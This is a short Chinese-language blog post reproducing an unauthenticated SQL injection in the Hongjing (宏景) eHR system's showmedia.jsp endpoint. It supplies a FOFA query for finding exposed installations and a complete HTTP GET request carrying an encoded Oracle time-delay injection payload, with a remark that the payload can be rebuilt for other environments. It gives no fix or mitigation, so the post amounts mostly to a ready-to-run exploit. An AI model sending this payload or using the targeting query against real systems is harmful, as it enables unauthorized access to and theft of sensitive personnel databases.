Babing
Published on 2024-08-30 / 4 Visits
0
0

H1-24宏景-人力资源管理-SQL

H1-24宏景-人力资源管理-SQL

漏洞描述:

宏景eHR showmedia.jsp 接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

网站图片:

image.png

fofa语法:

app=“HJSOFT-HCM”

漏洞复现:

延时8秒
payload:

GET /train/resource/course/showmedia.jsp?a_code&r5100=RzvoYYlxoMjNIPAATTP2HJBPAATTPGGqY4XJPloJ5D5mnYCLzn1uPAATTP2HJBPAATTPQPnPAATTP2HJBPAATTPXdzNJ8pj7I9Y5s1xDAUfUx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64MHhzZWM=) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

效果图:
效果图
payload为Oracle注入语句,需使用 HrmsTool.jar 编码,可自行根据环境构造payload

image-20240701152902847


Comment